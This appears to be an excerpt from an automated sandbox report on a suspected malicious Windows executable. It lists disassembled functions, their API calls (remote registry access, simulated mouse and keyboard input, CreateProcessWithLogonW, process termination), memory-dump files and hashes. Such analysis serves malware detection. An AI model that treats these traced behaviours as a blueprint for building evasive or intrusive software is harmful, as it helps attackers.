Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FB9FBE

__mtinitlocks.LIBCMT ref: 00FB9AEB
__mtterm.LIBCMT ref: 00FB9AF4

Part of subcall function 00FB9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FB9AF9,00FB7CD0,0104A0B8,00000014), ref: 00FB9C56
Part of subcall function 00FB9B5C: _free.LIBCMT ref: 00FB9C5D
Part of subcall function 00FB9B5C: DeleteCriticalSection.KERNEL32(0104EC00,?,?,00FB9AF9,00FB7CD0,0104A0B8,00000014), ref: 00FB9C7F

__calloc_crt.LIBCMT ref: 00FB9B19
__initptd.LIBCMT ref: 00FB9B3B
GetCurrentThreadId.KERNEL32 ref: 00FB9B42

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 37b95aadb4236535d168e358a4fe201c22c6416bf0e955c9dc3bac612d802ca4
Instruction ID: 99c4206f6657eb7083a2265306c66dd3b9590f40f3cf8f4c6634058476472f6e
Opcode Fuzzy Hash: 37b95aadb4236535d168e358a4fe201c22c6416bf0e955c9dc3bac612d802ca4
Instruction Fuzzy Hash: 5AF0963690D7112AE6347677BC036CA36989F42734F204619F694C51C6EFDD89416E60

Function 00FB406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FB3F85), ref: 00FB4085
GetProcAddress.KERNEL32(00000000), ref: 00FB408C
EncodePointer.KERNEL32(00000000), ref: 00FB4097
DecodePointer.KERNEL32(00FB3F85), ref: 00FB40B2

Strings

RoUninitialize, xrefs: 00FB4074
combase.dll, xrefs: 00FB4080

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: e6435454e11e39f192c40f95c3d4e7234dd756d0400f81c26567d2fa331cc07e
Instruction ID: eb05e3a2353431a283ae9d184b08ccbd9cd1020c2157e94c108c965311bd49ba
Opcode Fuzzy Hash: e6435454e11e39f192c40f95c3d4e7234dd756d0400f81c26567d2fa331cc07e
Instruction Fuzzy Hash: C1E09A70581301ABDB30AF72E909B463AB9B714792F104018F981D9048CB7F5504AB18

Function 00FF64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FF660B
_memmove.LIBCMT ref: 00FF6546

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

_memmove.LIBCMT ref: 00FF65B9
_memmove.LIBCMT ref: 00FF66A0
_memmove.LIBCMT ref: 00FF66B9
_memmove.LIBCMT ref: 00FF66D5

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3fd6988472e4aa1aa35ce34ebe0d23a15edce03bbaf9a95066af34e064a33923
Instruction ID: dec662f8f33b801b22977ed16e574643be23925a3d131df737b25c24ecbd9b2d
Opcode Fuzzy Hash: 3fd6988472e4aa1aa35ce34ebe0d23a15edce03bbaf9a95066af34e064a33923
Instruction Fuzzy Hash: 5E61AD3190024E9BDF01EF64CC82AFE37A9AF04308F494518FA15AB1A2DF78EC05EB50

Function 010101E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 01010E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010102BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010102FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01010320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01010349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0101038C
RegCloseKey.ADVAPI32(00000000), ref: 01010399

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 4d2cf083dc0df2aadc5088368777c636d31e6bdbd51aa5afbb22e37cac67240c
Instruction ID: 4737fd98714c480b12b249c8d3a4e94c27e837b5737af3e74678096eb7a23cbc
Opcode Fuzzy Hash: 4d2cf083dc0df2aadc5088368777c636d31e6bdbd51aa5afbb22e37cac67240c
Instruction Fuzzy Hash: 94516831208301AFDB15EF68C885EAFBBE8EF84314F04491DF585872A5DB39E948DB52

Function 01015799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 010157FB
GetMenuItemCount.USER32(00000000), ref: 01015832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0101585A
GetMenuItemID.USER32(?,?), ref: 010158C9
GetSubMenu.USER32(?,?), ref: 010158D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 01015928

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 6213a8ee25d458d7148e65f320075a0cd117eabbaae737639970738c9dff2fc4
Instruction ID: a615528173cb7db797e2650d57c78bf07315140636d29ea6b6b1aad11f4a7ac9
Opcode Fuzzy Hash: 6213a8ee25d458d7148e65f320075a0cd117eabbaae737639970738c9dff2fc4
Instruction Fuzzy Hash: BF518C31E00615AFDF11DF68CC45AAEBBB5EF89320F004099ED81BB351CB79AE419B90

Function 00FEEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FEEF06
VariantClear.OLEAUT32(00000013), ref: 00FEEF78
VariantClear.OLEAUT32(00000000), ref: 00FEEFD3
_memmove.LIBCMT ref: 00FEEFFD
VariantClear.OLEAUT32(?), ref: 00FEF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FEF078

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 37008fc6dc523080f9b84586aa76f966ab01f8f3696c2f2752f6793cc13cbab2
Instruction ID: 841cc7f156438ecdd4870abc60c887791e3df5ad67e0905d8a36c122fd083326
Opcode Fuzzy Hash: 37008fc6dc523080f9b84586aa76f966ab01f8f3696c2f2752f6793cc13cbab2
Instruction Fuzzy Hash: 02517BB5A00249EFCB10CF58C880AAAB7B8FF4C310B158569EE49DB305E735E915CFA0

Function 00FF220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF22A3
IsMenu.USER32(00000000), ref: 00FF22C3
CreatePopupMenu.USER32 ref: 00FF22F7
GetMenuItemCount.USER32(000000FF), ref: 00FF2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FF2386

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 8f7a16c3d73acf118566bbc5ff6b43ba2e3a5dc6cbd93349d97b68d862d87a1e
Instruction ID: ef6f058e66c0bc07fe96291e065d5b24b4d8e5542b8f236aa9df15a528472d6f
Opcode Fuzzy Hash: 8f7a16c3d73acf118566bbc5ff6b43ba2e3a5dc6cbd93349d97b68d862d87a1e
Instruction Fuzzy Hash: CC51CFB0A0020EDBDF61CF68C888BBDBBF5BF05324F104159EA55AB2A0D3798904DB51

Function 00F91765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00F9179A
GetWindowRect.USER32(?,?), ref: 00F917FE
ScreenToClient.USER32(?,?), ref: 00F9181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F9182C
EndPaint.USER32(?,?), ref: 00F91876

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: b895ac979b0d27a40ba1ee12be6495450222dca882178600d0916bca9719a930
Instruction ID: aa8692f857004e321151ad29a9f6a10228584fcc63dedbb78edb882c482ef8ef
Opcode Fuzzy Hash: b895ac979b0d27a40ba1ee12be6495450222dca882178600d0916bca9719a930
Instruction Fuzzy Hash: 2D41A231504302AFEB20DF24CC85FB67BE8FB59724F144668F594872A1C7359845EB61

Function 0101B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(010557B0,00000000,00AA67A8,?,?,010557B0,?,0101B5A8,?,?), ref: 0101B712
EnableWindow.USER32(00000000,00000000), ref: 0101B736
ShowWindow.USER32(010557B0,00000000,00AA67A8,?,?,010557B0,?,0101B5A8,?,?), ref: 0101B796
ShowWindow.USER32(00000000,00000004,?,0101B5A8,?,?), ref: 0101B7A8
EnableWindow.USER32(00000000,00000001), ref: 0101B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0101B7EF

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f2a0576f16cb84937c04593f98e227afc6fee7c2b5b11b82e31eca87bfe31124
Instruction ID: 3e94857899c6671a61ae0f11ffd1312df9fa6299f2d4dfc3eefe1e8b24cfb393
Opcode Fuzzy Hash: f2a0576f16cb84937c04593f98e227afc6fee7c2b5b11b82e31eca87bfe31124
Instruction Fuzzy Hash: F8417134600241AFDB62CF28C499B947FF1FF09310F1C41E9EA888F6A6C739A456DB50

Function 0100709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,01004E41,?,?,00000000,00000001), ref: 010070AC

Part of subcall function 010039A0: GetWindowRect.USER32(?,?), ref: 010039B3

GetDesktopWindow.USER32 ref: 010070D6
GetWindowRect.USER32(00000000), ref: 010070DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0100710F

Part of subcall function 00FF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF52BC

GetCursorPos.USER32(?), ref: 0100713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01007199

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: a5671fc919bf8dc0bc9c0f0f9ce5fd4b17e94b873e9aa5e718fd98bfcf716756
Instruction ID: 0dcbff7d9bf948ec7b8850a445e41b7c3b3ab7954a83b6b74b028b00d522f0c8
Opcode Fuzzy Hash: a5671fc919bf8dc0bc9c0f0f9ce5fd4b17e94b873e9aa5e718fd98bfcf716756
Instruction Fuzzy Hash: AD31B272505306AFD721DF18C849B9BBBEAFF88314F000919F6D5971C1CA79EA09CB92

Function 00FE8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FE80C0
Part of subcall function 00FE80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FE80CA
Part of subcall function 00FE80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FE80D9
Part of subcall function 00FE80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FE80E0
Part of subcall function 00FE80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FE80F6

GetLengthSid.ADVAPI32(?,00000000,00FE842F), ref: 00FE88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FE88D6
HeapAlloc.KERNEL32(00000000), ref: 00FE88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00FE88F6
GetProcessHeap.KERNEL32(00000000,00000000,00FE842F), ref: 00FE890A
HeapFree.KERNEL32(00000000), ref: 00FE8911

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f1795acbea8cce36c00283834b55a93487c2e08c6df55c6e0f4bd0a3d500b455
Instruction ID: 2ef467242e592683924335159e3439914824f029ba1a72d8f86f4100062a5fcd
Opcode Fuzzy Hash: f1795acbea8cce36c00283834b55a93487c2e08c6df55c6e0f4bd0a3d500b455
Instruction Fuzzy Hash: 9911B431901205FFDB21AF95DC09BBE7769EB45361F104119F88997101CB3A9D05EB61

Function 00FE85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FE85E2
OpenProcessToken.ADVAPI32(00000000), ref: 00FE85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FE85F8
CloseHandle.KERNEL32(00000004), ref: 00FE8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FE8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00FE8646

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0f187d1fc340a69cf41f7b970e1b05b95b5dfc7653e01265c98e7b0c9a5ed133
Instruction ID: 8469fe27b4a6f8dba6b4678ae47ec128c5ab3f648834be3c04f646f39792d8f9
Opcode Fuzzy Hash: 0f187d1fc340a69cf41f7b970e1b05b95b5dfc7653e01265c98e7b0c9a5ed133
Instruction Fuzzy Hash: 5B118C7250024AAFDF12DEA4DC48BDE7BA8FF08354F044014FE09A2160C77A8E65EB60

Function 00FEB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FEB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00FEB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FEB7CD
ReleaseDC.USER32(00000000,00000000), ref: 00FEB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FEB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00FEB7FE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f53e012edc1c35793b4c38f6cc9f6e21956291cba9d4a76e15d04a9dc1a9985d
Instruction ID: e5eaae03d10d4d60ef3c23251ee8f10cced00eb1ce637d18bd5ba14da5c5e9b1
Opcode Fuzzy Hash: f53e012edc1c35793b4c38f6cc9f6e21956291cba9d4a76e15d04a9dc1a9985d
Instruction Fuzzy Hash: AC018475E00309BBEF109BF69C45A5EBFB8EB48361F004065FA04A7281D6359C00CF90

Function 00FB0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB01C1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: fdea3d509cca070ae2f794051c4ac75159c458f9c1795713a85e26296b373cf5
Instruction ID: 04d135753d54c82f1ce9a57e0e06ff83cc8c8f11549f5dd7a2a1cbc4ce11b84c
Opcode Fuzzy Hash: fdea3d509cca070ae2f794051c4ac75159c458f9c1795713a85e26296b373cf5
Instruction Fuzzy Hash: F0016CB0901B5A7DE3008F6A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5

Function 00FF53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FF53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FF540F
GetWindowThreadProcessId.USER32(?,?), ref: 00FF541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF543E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b19a1403ef4f31b4f978f2374e1dc0d6d41102cb8ff29ce668101dbe6356c04e
Instruction ID: e3cf021e1a671fc6cdddf00041b0ef6cbac25e59776dc7d49a6a854fdd1718f6
Opcode Fuzzy Hash: b19a1403ef4f31b4f978f2374e1dc0d6d41102cb8ff29ce668101dbe6356c04e
Instruction Fuzzy Hash: C0F06D32240559BBE3315AA29C0DEAB7A7CEFCAB11F000159FA44D1045D6AA1A0587B5

Function 00FF7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00FF7243
EnterCriticalSection.KERNEL32(?,?,00FA0EE4,?,?), ref: 00FF7254
TerminateThread.KERNEL32(00000000,000001F6,?,00FA0EE4,?,?), ref: 00FF7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FA0EE4,?,?), ref: 00FF726E

Part of subcall function 00FF6C35: CloseHandle.KERNEL32(00000000,?,00FF727B,?,00FA0EE4,?,?), ref: 00FF6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF7281
LeaveCriticalSection.KERNEL32(?,?,00FA0EE4,?,?), ref: 00FF7288

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
